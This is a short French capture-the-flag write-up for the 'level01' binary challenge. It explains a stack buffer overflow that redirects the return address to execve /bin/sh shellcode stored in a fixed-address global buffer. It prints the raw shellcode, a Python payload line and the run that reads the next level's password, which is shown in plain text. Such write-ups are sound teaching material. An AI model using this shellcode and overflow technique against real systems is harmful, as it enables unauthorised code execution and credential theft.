le user attendue est dat_wil
    user_name_ptr = (char *)"dat_wil";

on recupere l'address de la global user_name qui est rempli avec fgets: 0x804a040
    movl   $0x804a040,(%esp)
    call   0x8048370 <fgets@plt>

l'address 0x804a040 de user_name est toujours la meme


nasm -f elf shellcode.asm

shellcode to execute
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80

on met un shellcode dans la global user_name avec le premier fgets
et ensuite on fait overflow le deuxieme fgets avec son buffer de 64 octets et une limite de lecture de 100
on remplace la valeur du registre EIP qui stocke un pointeur vers l'adresse de l'instruction en cours d'exécution
et quand la fonction main return la prochaine instruction a etre execute sera dans la global user_name donc le shellcode

python -c 'print "dat_wil" + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "\n" + "a"*64 + "b"*16 + "\x47\xa0\x04\x08"' > /tmp/level01_overflow

$ cat /tmp/level01_overflow - | ./level01
    ********* ADMIN LOGIN PROMPT *********
    Enter Username: verifying username....

    Enter Password: 
    nope, incorrect password...

    cat /home/users/level02/.pass
    PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv
